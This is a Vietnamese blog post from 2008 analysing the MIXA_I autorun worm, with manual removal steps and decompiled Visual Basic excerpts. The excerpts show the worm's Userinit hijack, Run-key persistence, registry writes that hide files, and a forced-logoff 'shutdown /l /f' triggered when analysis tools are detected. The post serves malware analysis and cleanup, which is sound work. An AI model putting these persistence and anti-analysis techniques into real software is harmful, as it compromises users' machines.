Jun 28, 2008
78 Views

virut [MIXA_I] v1.0.0.2

Written by

1. Loại malware này khi nhiễm vào máy sẽ tạo key vào Registry ở hive HKLM. Mở rộng với 3 key [OptionalComponents]. Thừa hưởng tính năng SupperHidden của dòng họ [Autorun Virus]

2. Chạy process với [Image Name] là MIXA_I, [User Name] = [Computer_Name] chứ ko ngụy trang dưới dạng [SYSTEM], [LOCAL SERVICE] hay [NETWORK SERVICE] :) ;)
Điểm đặc biệt của con này là khả năng nhận dạng chương trình [Registry Editor] và [Task Manager] của Windows ở các hàm FindWindow. Một khi đã detect ra, tức là user đang execute [Regedit] | [Taskmgr] từ [Start Menu Run] hoặc chạy trực tiếp một trong hai tool này từ trong [Windows Directory], MIXA_I sẽ gọi một số hàm [OpenProcessToken], [LookupPrivilegeValue], [AdjustTokenPrivileges]… liên kết với procedure [ExitWindowsEx] có tham số [EWX_LOGOFF + EWX_FORCE, NULL] tạo ra tình huống tự động LOGOFF.

Nói một cách đơn giản hơn, nếu máy đã lây nhiễm, bạn chỉ cần chạy Regedit hoặc Task Manager(trực tiếp hay gián tiếp) là lập tức 3 sec sau sẽ bị Logoff.

3. Điểm nhấn nữa là tác giả của malware này có “để mắt” đến một số tool có khả năng can thiệp vào [Registry] hoặc [Windows Task Manager] như:
– Reg3Dit.exe: tool này tui đã intro với các bạn trong REATeam Release rồi nên xin phép ko nói thêm :)
– procexp.exe: đây chính là Process Explorer của Sysinternals. Cách sử dụng tương tự như Task Manager nhưng ưu việt hơn.
– còn một số tool nữa nhưng chưa có thời gian test :)
Giả sử trên máy của bạn có 2 tool này, bạn để nguyên xi tên đó mà execute, thì kết quả sẽ đi theo mục 2 ở trên :)
Đây là điểm mạnh và cũng chính là điểm yếu nhất của malware này!

4. Tạo [Autorun.inf] và [MIXA_I.exe] trên mỗi hard drive, USB, mapped drive… mà nó detected:

Nhân bản thành [systemio.exe] vào SystemDirectory(system32):

Edit lại value của [Userinit] trong hive [HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] từ [C:WINDOWSsystem32userinit.exe,] thành [C:WINDOWSsystem32systemio.exe]. Hậu quả của value này là, sau khi bạn reboot máy | logoff trở lại, bạn sẽ ko thể logon vào Win được nữa.

Một số “động tác phụ” được liệt kê cụ thể trong Process Explorer, các bạn có thể test để có thêm kết quả:

5. Giới thiệu với các bạn 2 cách fixed đơn giản:

Cách I:
– Dùng PEiD v0.9x detected. Kết quả trả về là malware này [coded = Visual Basic 5.0 / 6.0] và [not pack] + [not crypto]

– Chọn chức năng [Task Viewer]. Kéo thanh trượt xuống, right click vào MIXA.EXE có đường dẫn [C:WINDOWSMIXA.EXE] chọn [Kill Selected Task]:

– JMP @@Extras

Cách II:
– Rename procexp.exe (Process Explorer – nếu trên máy bạn đã có) thành rocexp.exe chẳng hạn. Sau đó chạy file rocexp.exe này ta sẽ có danh sách tất cả các tiến trình hệ thống đang chạy:

– Làm tương tự như cách I, tức là right click vào process [Mixa.exe] có trong danh sách > [Kill Process Tree].

– JMP @@Extras

@@Extras:

– Vào từng hard drive, usb… để del [Autorun.inf] + [MIXA_I.exe]. Cần chú ý cách truy cập ổ đĩa đối với các dạng [Autorun Virus] này! Đừng quên del luôn em [systemio.exe] trong SystemDirectory nha!

– Vào Registry truy tới key này và del nó đi. Fixed lại chút đỉnh để bypass chức năng SupperHidden(có thể chạy tool REA Removal Tools để làm cho lẹ :) )

– Fix lại value logon mặc định của Windows trong [HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] trở về tình trạng ban đầu là [C:WINDOWSsystem32userinit.exe,].

– Restart lại máy. Everything is okies!

__________________________________________________

Thông tin thêm

Private sub Unknown_40B140
‘Data Table: 4077FC
loc_40B118: On Error Goto 0
loc_40B124: var_8C = arg_C &”Autorun.inf”
loc_40B12E: var_88 = “C:WINDOWSsystem32 restart.scf”
loc_40B131: ext_401030
loc_40B13F: Exit Sub
End Sub

Private sub Unknown_40C218
‘Data Table: 407DD8
loc_40C0E5: For var_8E = &H0 To (Form1.List1.Listcount – &H1): MemVar_40E08C = var_8E ‘Integer
loc_40C108:   var_A4 = CVar(Form1.List1.List(MemVar_40E08C)) ‘String
loc_40C10E:   ext_401004
loc_40C116:   var_C4 = “taskmgr*”
loc_40C11B:   LikeVar
loc_40C13C:   var_EC = CVar(Form1.List1.List(MemVar_40E08C)) ‘String
loc_40C142:   ext_401004
loc_40C14F:   LikeVar
loc_40C174:   var_144 = CVar(Form1.List1.List(MemVar_40E08C)) ‘String
loc_40C17A:   ext_401004
loc_40C187:   LikeVar
loc_40C1AC:   var_19C = CVar(Form1.List1.List(MemVar_40E08C)) ‘String
loc_40C1B2:   ext_401004
loc_40C1BF:   LikeVar
loc_40C1E7:   If CBool(var_1AC Or “mmc*”) Then
loc_40C1EF:     &HFF = Unknown_40AF60(var_1AC, “”, “” Or “regedit*”, “”, “”, “” Or “procexp*”, “”, “”)
loc_40C204:     ext_401018
loc_40C209:     var_1E4 = “shutdown /l /f”
loc_40C20F:   End If
loc_40C212: Next var_8E ‘Integer
loc_40C217: Exit Sub

Ngoài những tool nó dectect như anh XIANUA post ở trên.Nó detect thêm lệnh mmc

Private sub Unknown_40C058
‘Data Table: 407B40
loc_40BEEF: Me(16) = “.m”
loc_40BEF7: Me(20) = “p”
loc_40BEFF: Me(24) = “3”
loc_40BF07: Me(28) = “l”
loc_40BF0F: Me(32) = “o”
loc_40BF17: Me(36) = “g”
loc_40BF1F: Me(40) = “m”
loc_40BF27: Me(44) = “ui”
loc_40BF2F: Me(48) = “04”
loc_40BF37: Me(52) = “16”
loc_40BF3E: Me(6) = &H1E
loc_40BF9F: Me(8) = MemVar_40E064 & MemVar_40E068 & MemVar_40E06C & MemVar_40E070 & “” & MemVar_40E044 & MemVar_40E048 & MemVar_40E074 & “” & Me(40) & Me(44) & Me(48) & Me(52)
loc_40BFED: Me(12) = Me(28) & Me(32) & Me(36) & Me(16) & Me(20) & Me(24)
loc_40C01C: arg_1CVar(Me(8) & Me(12))..m = var_D4
loc_40C036: var_C0 = var_D4.o
loc_40C03D: CastAdVar arg_14
loc_40C047: SetPropA
loc_40C056: Exit Sub
End Sub

Đường dẫn đến file nhạc để phát

Private sub Unknown_40B488
‘Data Table: 407B40
loc_40B43F: ext_401044
loc_40B44A: ext_401054
loc_40B453: Me(0) = CInt(var_A4)
loc_40B46A: Me(2) = (Me(0) + Me(6))
loc_40B477: If (Me(2) >= &H3C) Then
loc_40B482:   Me(2) = (Me(2) – &H3C)
loc_40B487: End If
loc_40B487: Exit Sub
End Sub

Private sub Unknown_40BBF4
‘Data Table: 407B40
loc_40BB4B: ext_401044
loc_40BB56: ext_401054
loc_40BB5F: Me(4) = CInt(var_A4)
loc_40BB76: If (Me(2) = Me(4)) Then
loc_40BB8F:   CastAdVar arg_14
loc_40BB99:   PropBag.WritePropert(var_A4, var_A8.o, var_A8.o)
loc_40BBAB:   ext_401044
loc_40BBB6:   ext_401054
loc_40BBBF:   Me(0) = CInt(var_A4)
loc_40BBD6:   Me(2) = (Me(0) + Me(6))
loc_40BBE3:   If (Me(2) >= &H3C) Then
loc_40BBEE:     Me(2) = (Me(2) – &H3C)
loc_40BBF3:   End If
loc_40BBF3: End If
loc_40BBF3: Exit Sub
End Sub

Xác định time phát nhạc
Write_file From_Resource

Private sub Unknown_40BA10
‘Data Table: 407628
loc_40B980: On Error Goto 0
loc_40B991: var_88 = C:WINDOWSsystem32mui416log.mp3
loc_40B994: ext_401058
loc_40B9DA: Open C:WINDOWSsystem32mui416log.mp3 For Binary As &H2 Len = &HFF
loc_40B9E8: Put &H2, , LoadResData(101, “MP3”)
loc_40B9F0: Close &H2
loc_40BA00: var_88 = C:WINDOWSsystem32mui416log.mp3
loc_40BA03: msvbvm60.rtcSetFileAttr

Phát nhạc với tên log.mp3 (bài “I lay my love on you”) tại C:WINDOWSsystem32mui416

CALL_EXPLORER

Private sub Unknown_40BD28
‘Data Table: 4079C8
loc_40BC36: var_86 = &H0
loc_40BC5E: For var_92 = &H0 To (Form1.List1.Listcount – &H1): MemVar_40E08C = var_92 ‘Integer
loc_40BC81:   var_A8 = CVar(Form1.List1.List(MemVar_40E08C)) ‘String
loc_40BC87: msvbvm60.rtcLowerCaseVar
loc_40BCA1:   If (var_B8 = “explorer.exe”) Then
loc_40BCA6:     var_86 = &HFF
loc_40BCA9:   End If
loc_40BCAC: Next var_92 ‘Integer
loc_40BCB7: If (var_86 = &H0) Then
loc_40BCCA:  msvbvm60.rtcShell
loc_40BCCF:   var_E0 = “explorer”
loc_40BCD5: End If
loc_40BD07: If (App.EXEName & “.exe” = systemio.exe) Then
loc_40BD19:  msvbvm60.rtcShell
loc_40BD1E:   var_E0 = CVar(MemVar_40E038 & MemVar_40E024)
loc_40BD24:   End
loc_40BD26: End If
loc_40BD26: Exit Sub
End Sub

Private sub Unknown_40B280
‘Data Table: 4079C8
loc_40B248: Unknown_40B938()
loc_40B257: If (Len(MemVar_40E040) = &H3) Then
loc_40B270:   ext_401018
loc_40B275:   var_A0 = CVar(“explorer” & “” & MemVar_40E040)
loc_40B27E: End If
loc_40B27E: Exit Sub
End Sub

Private sub Unknown_40B938
‘Data Table: 4079C8
loc_40B8C1: var_9C = CVar(App.Path) ‘String
loc_40B8C7: ext_401050
loc_40B8E1: If CBool(var_AC <> “”) Then
loc_40B904:   MemVar_40E040 = App.Path & “”
loc_40B90E:   GoTo loc_40B934
loc_40B911: End If
loc_40B92D: MemVar_40E040 = App.Path
loc_40B934: ‘ Referenced from: 40B90E
loc_40B934: Exit Sub
loc_40B935: arg_0 = CVar(MemVar_40E040) ‘Currency
End Sub

Set_regedit

Private sub Unknown_40CE18
‘Data Table: 407CD4
loc_40C9DF: Me(16) = “HKLMSOFTWARE”
loc_40C9E7: Me(36) = “Userinit”
loc_40C9EF: Me(20) = “Microsoft”
loc_40C9F7: Me(24) = “Windows NT”
loc_40C9FF: Me(32) = “Winlogon”
loc_40CA07: Me(28) = “CurrentVersion”
loc_40CA17: ext_401024
loc_40CA24: SetVarVarFunc
loc_40CA55: var_94 = CVar(Me(16) & Me(20) & Me(24) & Me(28) & Me(32) & Me(36)) ‘String
loc_40CA60: var_C4 = CVar(MemVar_40E034 & MemVar_40E020) ‘String
loc_40CA64: var_E4 = “REG_SZ”
loc_40CA71: Call Me(0).RegWrite
loc_40CA89: var_B4 = “HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunVirus”
loc_40CA96: var_94 = CVar(MemVar_40E038 & MemVar_40E024) ‘String
loc_40CA9A: var_F4 = “REG_SZ”
loc_40CAA7: Call Me(0).RegWrite
loc_40CAB0: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedServerAdminUI”
loc_40CAB6: var_E4 = “0”
loc_40CABC: var_104 = “REG_DWORD”
loc_40CAC9: Call Me(0).RegWrite
loc_40CACF: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHidden”
loc_40CAD5: var_E4 = “2”
loc_40CADB: var_104 = “REG_DWORD”
loc_40CAE8: Call Me(0).RegWrite
loc_40CAEE: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowCompColor”
loc_40CAF4: var_E4 = “1”
loc_40CAFA: var_104 = “REG_DWORD”
loc_40CB07: Call Me(0).RegWrite
loc_40CB0D: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideFileExt”
loc_40CB13: var_E4 = “1”
loc_40CB19: var_104 = “REG_DWORD”
loc_40CB26: Call Me(0).RegWrite
loc_40CB2C: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedDontPrettyPath”
loc_40CB32: var_E4 = “0”
loc_40CB38: var_104 = “REG_DWORD”
loc_40CB45: Call Me(0).RegWrite
loc_40CB4B: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowInfoTip”
loc_40CB51: var_E4 = “1”
loc_40CB57: var_104 = “REG_DWORD”
loc_40CB64: Call Me(0).RegWrite
loc_40CB6A: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedHideIcons”
loc_40CB70: var_E4 = “0”
loc_40CB76: var_104 = “REG_DWORD”
loc_40CB83: Call Me(0).RegWrite
loc_40CB89: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedMapNetDrvBtn”
loc_40CB8F: var_E4 = “0”
loc_40CB95: var_104 = “REG_DWORD”
loc_40CBA2: Call Me(0).RegWrite
loc_40CBA8: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedWebView”
loc_40CBAE: var_E4 = “1”
loc_40CBB4: var_104 = “REG_DWORD”
loc_40CBC1: Call Me(0).RegWrite
loc_40CBC7: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFilter”
loc_40CBCD: var_E4 = “0”
loc_40CBD3: var_104 = “REG_DWORD”
loc_40CBE0: Call Me(0).RegWrite
loc_40CBE6: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedSuperHidden”
loc_40CBEC: var_E4 = “0”
loc_40CBF2: var_104 = “REG_DWORD”
loc_40CBFF: Call Me(0).RegWrite
loc_40CC05: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedSeparateProcess”
loc_40CC0B: var_E4 = “0”
loc_40CC11: var_104 = “REG_DWORD”
loc_40CC1E: Call Me(0).RegWrite
loc_40CC24: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedListviewAlphaSelect”
loc_40CC2A: var_E4 = “1”
loc_40CC30: var_104 = “REG_DWORD”
loc_40CC3D: Call Me(0).RegWrite
loc_40CC43: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedListviewShadow”
loc_40CC49: var_E4 = “1”
loc_40CC4F: var_104 = “REG_DWORD”
loc_40CC5C: Call Me(0).RegWrite
loc_40CC62: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedListviewWatermark”
loc_40CC68: var_E4 = “1”
loc_40CC6E: var_104 = “REG_DWORD”
loc_40CC7B: Call Me(0).RegWrite
loc_40CC81: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedTaskbarAnimations”
loc_40CC87: var_E4 = “1”
loc_40CC8D: var_104 = “REG_DWORD”
loc_40CC9A: Call Me(0).RegWrite
loc_40CCA0: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedStartMenuInit”
loc_40CCA6: var_E4 = “2”
loc_40CCAC: var_104 = “REG_DWORD”
loc_40CCB9: Call Me(0).RegWrite
loc_40CCBF: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedStartButtonBalloonTip”
loc_40CCC5: var_E4 = “2”
loc_40CCCB: var_104 = “REG_DWORD”
loc_40CCD8: Call Me(0).RegWrite
loc_40CCDE: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedNoNetCrawling”
loc_40CCE4: var_E4 = “0”
loc_40CCEA: var_104 = “REG_DWORD”
loc_40CCF7: Call Me(0).RegWrite
loc_40CCFD: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFolderContentsInfoTip”
loc_40CD03: var_E4 = “1”
loc_40CD09: var_104 = “REG_DWORD”
loc_40CD16: Call Me(0).RegWrite
loc_40CD1C: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedFriendlyTree”
loc_40CD22: var_E4 = “1”
loc_40CD28: var_104 = “REG_DWORD”
loc_40CD35: Call Me(0).RegWrite
loc_40CD3B: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedWebViewBarricade”
loc_40CD41: var_E4 = “1”
loc_40CD47: var_104 = “REG_DWORD”
loc_40CD54: Call Me(0).RegWrite
loc_40CD5A: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedDisableThumbnailCache”
loc_40CD60: var_E4 = “0”
loc_40CD66: var_104 = “REG_DWORD”
loc_40CD73: Call Me(0).RegWrite
loc_40CD79: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedShowSuperHidden”
loc_40CD7F: var_E4 = “0”
loc_40CD85: var_104 = “REG_DWORD”
loc_40CD92: Call Me(0).RegWrite
loc_40CD98: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedClassicViewState”
loc_40CD9E: var_E4 = “0”
loc_40CDA4: var_104 = “REG_DWORD”
loc_40CDB1: Call Me(0).RegWrite
loc_40CDB7: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedPersistBrowsers”
loc_40CDBD: var_E4 = “0”
loc_40CDC3: var_104 = “REG_DWORD”
loc_40CDD0: Call Me(0).RegWrite
loc_40CDD6: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedTaskbarSizeMove”
loc_40CDDC: var_E4 = “0”
loc_40CDE2: var_104 = “REG_DWORD”
loc_40CDEF: Call Me(0).RegWrite
loc_40CDF5: var_B4 = “HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvancedTaskbarGlomming”
loc_40CDFB: var_E4 = “0”
loc_40CE01: var_104 = “REG_DWORD”
loc_40CE0E: Call Me(0).RegWrite
loc_40CE14: Exit Sub
End Sub

Article Tags:
· ·
Article Categories:
Virut/Trojan
    http://linholiver.com

    https://linholiver.com/diary/about/